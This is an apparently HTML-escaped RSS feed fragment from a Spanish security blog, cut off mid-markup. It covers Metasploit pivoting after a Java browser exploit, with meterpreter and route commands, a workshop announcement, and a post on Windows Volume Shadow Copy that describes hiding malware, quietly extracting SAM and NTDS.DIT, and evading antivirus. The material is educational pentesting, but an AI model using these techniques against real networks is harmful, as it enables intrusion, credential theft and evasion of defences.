&lt;b&gt;&lt;u&gt;¿Cómo preparamos metasploit para explotar esa vulnerabilidad de JAVA en el equipo de USR_A?&amp;nbsp;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Utilizando el exploit basado en "navegadores" denominado:&amp;nbsp;&lt;b&gt;java_ws_arginject_altjvm, &lt;/b&gt;este exploit iniciará en nuestro equipo ATACANTE un servidor que explotará la vulnerabilidad &amp;nbsp;JAVA anteriormente mencionada.&lt;br /&gt;
&lt;br /&gt;
A continuación os dejo una captura de pantalla de la preparación de la URL maliciosa.&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-bMzk7BzkETs/UTYSajyXE6I/AAAAAAAAD94/ASg6eZ1xmRE/s1600/Fase_1_URL_JAVA_exploit.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="388" src="http://3.bp.blogspot.com/-bMzk7BzkETs/UTYSajyXE6I/AAAAAAAAD94/ASg6eZ1xmRE/s640/Fase_1_URL_JAVA_exploit.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 1: Preparación de JAVA exploit - URL maliciosa&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
Una vez que tenemos "preparado" nuestro equipo para recibir las conexiones de las posibles victimas, solo queda esperar a que "piquen" en nuestra trampa. En nuestro ejemplo practico, es el usuario A (USR_A) quién cae en nuestras redes, observen la siguiente imagen:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-whgxK4Ue1Ik/UTYTsI1wdKI/AAAAAAAAD-A/KTH-QyOY-ns/s1600/Fase_1_URL_JAVA_exploit_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="378" src="http://4.bp.blogspot.com/-whgxK4Ue1Ik/UTYTsI1wdKI/AAAAAAAAD-A/KTH-QyOY-ns/s640/Fase_1_URL_JAVA_exploit_2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Fase 1: URL con JAVA - Ataque exitoso.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;b&gt;FASE 2: Utilizando el equipo comprometido para explorar la red interna de la empresa.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Una vez que se tiene el control del equipo USR_A, se realiza una pequeña investigación de la victima, como por ejemplo:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Información del Sistema.&lt;/li&gt;
&lt;li&gt;Direccionamiento IP del equipo dentro de la red.&lt;/li&gt;
&lt;li&gt;Conexiones que tiene el equipo con otros elementos de la red interna.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Esto se consigue&amp;nbsp;fácilmente&amp;nbsp;utilizando los comando básico de "meterpreter", que es la shell avanzada que se ha utilizado para ejecutar en el equipo remoto a través de la vulnerabilidad de JAVA.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-mWcvhFJKKp4/UTYVWQDZnLI/AAAAAAAAD-I/CJuLYH4uTO8/s1600/Fase_2_Informaci%C3%B3n.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="282" src="http://2.bp.blogspot.com/-mWcvhFJKKp4/UTYVWQDZnLI/AAAAAAAAD-I/CJuLYH4uTO8/s640/Fase_2_Informaci%C3%B3n.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #666666;"&gt;&lt;span style="color: yellow;"&gt;meterpreter&amp;gt; sysinfo&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #666666;"&gt;&lt;span style="color: yellow;"&gt;meterpreter&amp;gt; netstat&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="background-color: #666666;"&gt;&lt;span style="color: yellow;"&gt;meterpreter&amp;gt; arp&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Con estos tres comandos de meterpreter, obtenemos información, con el comando arp y netstat, averiguamos:&lt;/div&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;&lt;b&gt;IP_USR_A&lt;/b&gt;: 192.168.3.3&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Tiene una conexión 445 con &lt;b&gt;192.168.2.3&lt;/b&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div&gt;
Hasta el momento es la información que se ha obtenido del equipo comprometido, ahora vamos a configurar "metasploit" para explorar la red interna a través de nuestra puerta de entrada , el usuario A.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Puesto que tenemos comprometido el usuario A, estamos en condiciones de utilizar dicho equipo como puerta de entrada, y scannear la red interna en busca de otros objetivos. Es lo que se conoce con el nombre de la técnica del "pivoting".&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Para conseguir este efecto, necesitamos que "metasploit" rute (redirija) &amp;nbsp;los paquetes (nuestro tráfico de red) a través de la conexión que tiene establecida con el equipo remoto comprometido, en este caso USR_A.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Para ello ejecutamos el siguiente comando:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="background-color: #666666; color: yellow;"&gt;metasploit&amp;gt; route add 192.168.2.0 255.255.255.0 1&lt;/span&gt;&lt;/blockquote&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
donde:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;1 es el identificador de nuestra sesión de "meterpreter" activa.&lt;/li&gt;
&lt;li&gt;192.168.2.0/24 es la subred objetivo, dada la pista obtenida al realizar el netstat.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-F6NhO7cLaJU/UTYXu6LjAoI/AAAAAAAAD-Q/ximg64xlK5M/s1600/Fase_2_Pivoting.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="330" src="http://3.bp.blogspot.com/-F6NhO7cLaJU/UTYXu6LjAoI/AAAAAAAAD-Q/ximg64xlK5M/s640/Fase_2_Pivoting.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;br /&gt;
Ahora se tiene configurado "metasploit" para que el tráfico de red con destino 192.168.2.0/24 (subred interna de la empresa objetivo) sea enviado a través del equipo comprometido USR_A, ser por tanto utilizado como pivote.&lt;br /&gt;
&lt;br /&gt;
En este punto, se tiene una ligera pista sobre un objetivo situado en otro segmento de red dentro de la empresa, se trata de 192.168.2.3, pero por el momento solo tenemos conocimiento de tener una conexión establecida en el puerto 445, normalmente utilizado en la conexión de carpetas compartidas en windows, bajo el protocolo SMB.&lt;br /&gt;
&lt;br /&gt;
En el siguiente artículo, se utilizará al usuario A (USR_A) como "pivote" para realizar un scaneado de la IP objetivo 192.168.2.3 con nmap, y atacar con un exploit remoto ...&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;¿Te lo vas a perder?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=iUhOnpt5iic:NdyQDKFSk4k:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=iUhOnpt5iic:NdyQDKFSk4k:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=iUhOnpt5iic:NdyQDKFSk4k:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=iUhOnpt5iic:NdyQDKFSk4k:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=iUhOnpt5iic:NdyQDKFSk4k:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=iUhOnpt5iic:NdyQDKFSk4k:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=iUhOnpt5iic:NdyQDKFSk4k:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=iUhOnpt5iic:NdyQDKFSk4k:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=iUhOnpt5iic:NdyQDKFSk4k:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=iUhOnpt5iic:NdyQDKFSk4k:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/iUhOnpt5iic" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/iUhOnpt5iic/pivoting-exploracion-de-una-red-remota.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-32PTeyEdsSg/UTYylvVnjMI/AAAAAAAAD-0/Mi2QWkuu9xc/s72-c/Taller_Hacking_Etico_UCO_p1.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/pivoting-exploracion-de-una-red-remota.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-2340072138896674144</guid><pubDate>Fri, 01 Mar 2013 20:03:00 +0000</pubDate><atom:updated>2013-03-01T21:03:53.447+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Taller</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Universidad</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Etico</category><category domain="http://www.blogger.com/atom/ns#">ACONSA</category><category domain="http://www.blogger.com/atom/ns#">Córdoba</category><title>I Taller de Hacking Ético - Universidad de Córdoba</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-wvjdTXTLwmI/UTEIabnTz_I/AAAAAAAAD9E/DjARqG8VCBM/s1600/Taller_Hacking_UCO_2013.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-wvjdTXTLwmI/UTEIabnTz_I/AAAAAAAAD9E/DjARqG8VCBM/s1600/Taller_Hacking_UCO_2013.png" /&gt;&lt;/a&gt;&lt;/div&gt;
Tengo el placer de ser invitado por &lt;a href="https://twitter.com/Miguel_Arroyo76" target="_blank"&gt;Miguel A. Arroyo&lt;/a&gt; y &lt;a href="http://www.aconsaseguridad.com/" target="_blank"&gt;ACOSA Seguridad&lt;/a&gt; para impartir una charla el próximo 4 de Marzo 20134 en el I &lt;a href="http://hacking-etico.com/2013/02/25/taller-de-hacking-etico-universidad-de-cordoba/" target="_blank"&gt;Taller de Hacking Ético de la Universidad de Córdoba&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Lugar:&lt;/b&gt;&amp;nbsp;&lt;span style="background-color: white; color: #222222; font-family: Arial, Tahoma, Verdana; font-size: 14px; line-height: 21.59375px; text-align: justify;"&gt;Edificio Darwin (C1), Aula B7 del Campus Universitario de Rabanales&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En mi sesión, se mostrará (demostración práctica) como se utiliza Metasploit Framework para realizar una intrusión (#pentesting), donde se pondrá en práctica la utilización de la técnica de pivoting para alcanzar nuestro objetivo (véase imagen adjunta).&lt;/div&gt;
&lt;br /&gt;
Al finalizar la charla, publicaré un artículo&amp;nbsp;didáctico a modo de resumen de la charla.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para ir abriendo el apetito os dejo el escenario sobre el que voy a trabajar y demostrar el ataque a un equipo remoto no accesible directamente desde Internet.&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-97yMehD9BKs/UTEI8pgBNSI/AAAAAAAAD9M/JsfG6NTOASI/s1600/Pivoting_metasploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="474" src="http://2.bp.blogspot.com/-97yMehD9BKs/UTEI8pgBNSI/AAAAAAAAD9M/JsfG6NTOASI/s640/Pivoting_metasploit.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&amp;nbsp;Saludos.&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=70gtFkrxlhU:7lbq_p6at0g:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=70gtFkrxlhU:7lbq_p6at0g:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=70gtFkrxlhU:7lbq_p6at0g:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=70gtFkrxlhU:7lbq_p6at0g:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=70gtFkrxlhU:7lbq_p6at0g:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=70gtFkrxlhU:7lbq_p6at0g:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=70gtFkrxlhU:7lbq_p6at0g:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=70gtFkrxlhU:7lbq_p6at0g:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=70gtFkrxlhU:7lbq_p6at0g:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=70gtFkrxlhU:7lbq_p6at0g:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/70gtFkrxlhU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/70gtFkrxlhU/i-taller-de-hacking-etico-universidad.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-wvjdTXTLwmI/UTEIabnTz_I/AAAAAAAAD9E/DjARqG8VCBM/s72-c/Taller_Hacking_UCO_2013.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/03/i-taller-de-hacking-etico-universidad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-8321469687222375073</guid><pubDate>Mon, 25 Feb 2013 15:13:00 +0000</pubDate><atom:updated>2013-03-25T13:10:53.023+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">VSC</category><category domain="http://www.blogger.com/atom/ns#">Forensics</category><category domain="http://www.blogger.com/atom/ns#">Volume</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><category domain="http://www.blogger.com/atom/ns#">IT Security</category><category domain="http://www.blogger.com/atom/ns#">Copy</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><category domain="http://www.blogger.com/atom/ns#">Backups</category><category domain="http://www.blogger.com/atom/ns#">Shadow</category><title>Windows Volume Shadow Copy | Implicaciones de Seguridad</title><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-6AkscaHGzpU/UStex3uCPBI/AAAAAAAAD28/KnoVdB0jRZ4/s1600/VSC_W8_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-6AkscaHGzpU/UStex3uCPBI/AAAAAAAAD28/KnoVdB0jRZ4/s1600/VSC_W8_1.png" /&gt;&lt;/a&gt;&lt;/div&gt;
Quizás muchos de vosotros ya&amp;nbsp;hayáis&amp;nbsp;oído&amp;nbsp;hablar del servicio "&lt;b&gt;Volume Shadow Copy&lt;/b&gt;" que Windows tiene activado por defecto. En este artículo voy a realizar una introducción a este servicio de Windows y a desvelar algunas de las implicaciones de Seguridad que trae&amp;nbsp;implícito&amp;nbsp;dicho servicio, sobre todo en el&amp;nbsp;ámbito&amp;nbsp;del&amp;nbsp;Análisis&amp;nbsp;Forense / Auditorias y Pentesting.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Qué es Volume Shadow Copy?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Este servicio esta presente en Windows desde la primera versión de XP, es el servicio responsable de crear copias de seguridad&amp;nbsp;periódicas&amp;nbsp;de nuestro equipo, con objeto de poder realizar una restauración del sistema, &amp;nbsp;es lo que normalmente conocemos como "punto de restauración del sistema".&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://2.bp.blogspot.com/-KtHB6q4CYzs/UStdq4wOeXI/AAAAAAAAD2o/3OIIxZhNad4/s1600/VSC_W8_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-KtHB6q4CYzs/UStdq4wOeXI/AAAAAAAAD2o/3OIIxZhNad4/s320/VSC_W8_2.png" width="274" /&gt;&lt;/a&gt;Este servicio (VSS) &lt;b&gt;crea copias ocultas&lt;/b&gt; (shadow copy) de cada uno de los bloques de 16k que recibe una variación y/o cambio de estado en la&amp;nbsp;partición&amp;nbsp;NTFS del disco duro. Este servicio realiza las copias de seguridad ocultas cada vez que ocurre una variación en el sistema como fruto de la instalación y/o actualización de un software / aplicación. Se puede decir que la frecuencia de realización de esta copias puede sucederse al menos con la periodicidad de cada dos semanas en Windows 7/8, esto se da por las actualizaciones del Sistema Windows.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;La utilización del disco duro&lt;/b&gt; suele variar de un Sistema Operativo a otro, por ejemplo en Windows Vista se reserva el 15% de la capacidad total del disco, sin embargo en &lt;b&gt;Windows 7/8 este tamaño es de aproximadamente 5%&lt;/b&gt;. Esto por supuesto, también depende de la actividad (cambios) que se detecten en el disco duro del Sistema.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://2.bp.blogspot.com/-I_EjEhOdv10/UStdujWkULI/AAAAAAAAD2w/Y1ua-TzrHvI/s1600/VSC_W8_3.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-I_EjEhOdv10/UStdujWkULI/AAAAAAAAD2w/Y1ua-TzrHvI/s320/VSC_W8_3.png" width="292" /&gt;&lt;/a&gt;&lt;b&gt;En Windows 8&lt;/b&gt;, se ha introducido el &lt;b&gt;"Historial de archivos"&lt;/b&gt; (del que ya os hablamos sobre ello en nuestro&amp;nbsp;&lt;a href="http://www.seguridadparatodos.es/2012/10/windows-8-pro-seguridad-primeras.html" target="_blank"&gt;análisis&amp;nbsp;de Seguridad de Windows 8&lt;/a&gt;) donde algunos, con cierto grado de exactitud, han&amp;nbsp;creído&amp;nbsp;que el servicio de copias ocultas de Windows&amp;nbsp;&lt;a href="http://blog.coultard.com/2012/11/windows-8-file-history-is-new-new.html" target="_blank"&gt;había&amp;nbsp;evolucionado&lt;/a&gt; hacia esa nueva&amp;nbsp;característica, nada mas lejos de la realidad, pues el servicio (VSS) sigue siendo el mismo, lo único es que ahora hay una nueva funcionalidad del Sistema Operativo que aprovecha ese servicio. &amp;nbsp;&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
No obstante, en Windows 8, el servicio de Volume Shadow Copy se encuentra activo y funcionando por defecto. Esto en parte se debe a que se tiene activado el sistema de protección del Sistema, o lo que es lo mismo, el servicio de "creación de puntos de restauración".&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En las &lt;u&gt;referencias&lt;/u&gt; os he dejado algunos enlaces para aquellos que deseen profundizar más en el servicio Volume Shadow Copy de Windows, o leer el siguiente documento PDF:&lt;a href="https://code.google.com/p/libvshadow/downloads/detail?name=Volume%20Shadow%20Snapshot%20%28VSS%29%20format.pdf" target="_blank"&gt;Analysis the Windows NT VSS format&lt;/a&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;¿Qué implicaciones de Seguridad tiene?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://www.schneier.com/blog/archives/2009/12/the_security_im.html" target="_blank"&gt;Bruce Schneier&lt;/a&gt;&amp;nbsp;ya en 2009, hacia publicas en su blog unas reflexiones sobre las implicaciones de Seguridad que el sistema de copias ocultas (VSS)&amp;nbsp;podía&amp;nbsp;generar, como ejemplo, explicaba que a pesar de usar un programa de "borrado seguro" el documento que&amp;nbsp;había&amp;nbsp;sido borrado seguía estando disponible en los&amp;nbsp;volúmenes&amp;nbsp;ocultos de forma permanente e indefinida.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Además, de los &lt;b&gt;evidentes&lt;/b&gt; usos de estos&amp;nbsp;volúmenes&amp;nbsp;&lt;b&gt;en los&amp;nbsp;análisis&amp;nbsp;forenses&lt;/b&gt; de equipos con Sistemas Windows, existen algunas otras posibilidades de utilizar estos&amp;nbsp;volúmenes&amp;nbsp;(VSC) en los &lt;b&gt;test de penetración&lt;/b&gt;, como por ejemplo:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;b&gt;&amp;gt; Ocultar elementos Malware&lt;/b&gt; en el Sistema, lejos de los "ojos" del Administrador del Sistema.&lt;br /&gt;&amp;gt; &lt;b&gt;Acceder a los archivos protegidos del Sistema Operativo&lt;/b&gt;, como por ejemplo: SAM, SYSTEM, NTDS.DIT, etc, de forma que se pueden extraer de forma "segura" dichos ficheros sin hacer ruido.&lt;br /&gt;&amp;gt; &lt;b&gt;Encontrar archivos antiguos&lt;/b&gt;, que fueron eliminados hace tiempo por el Administrador, como por ejemplo, listas de password.&lt;/blockquote&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
En particular, unas de las curiosidades que tienen los VSC (Volume Shadow Copy) es que el sistema AV (Antivirus) no tiene acceso a dichas particiones por lo que los ficheros con Malware que añadimos al volumen son indetectables. Sin embargo, si accedemos al volumen y ejecutamos el fichero, el sistema AV en tiempo real detectaría el "Malware" para evitar eso, he encontrado un pequeño truco, consiste en montar el volumen oculto (VSC) como si fuera una unidad de red, evitando así el&amp;nbsp;Análisis&amp;nbsp;por parte del Sistema Antivirus.&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para manipular estos volúmenes ocultos hace falta algunas herramientas y/o comandos, a continuación analizamos algunas de las herramientas mas interesantes que he encontrado al respecto.&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Herramientas para la manipulación de los&amp;nbsp;Volúmenes&amp;nbsp;ocultos de Windows&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Desde el punto de vista de #Pentester se hace evidente la necesidad de manipular los&amp;nbsp;volúmenes&amp;nbsp;ocultos (VSC) desde una línea de comandos, pues lo más probable es que si se consigue acceso remoto a un equipo durante un test de penetración sea gracias a una ventana de líneas de comandos remota.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Lo primero es &lt;b&gt;conocer que comandos "nativos" del Sistema operativo&lt;/b&gt; se tienen disponibles para manipular dichos&amp;nbsp;volúmenes&amp;nbsp;ocultos, en particular se tiene:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
- &lt;b&gt;VSSADMIN&lt;/b&gt; : Es la herramienta administrativa del Servicio de Volume Shadow Snapshots (VSS), que permite administrar dichos&amp;nbsp;volúmenes.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-hO20JxiKz48/USt6D7_6T0I/AAAAAAAAD5c/3gyZdJZxVpw/s1600/VSC_W8_CMD_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="393" src="http://2.bp.blogspot.com/-hO20JxiKz48/USt6D7_6T0I/AAAAAAAAD5c/3gyZdJZxVpw/s400/VSC_W8_CMD_1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
- &lt;b&gt;MKLINK&lt;/b&gt;&amp;nbsp;: Se utiliza para crear un vinculo&amp;nbsp;simbólico&amp;nbsp;a un objeto del sistema como por ejemplo un volumen VSC.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
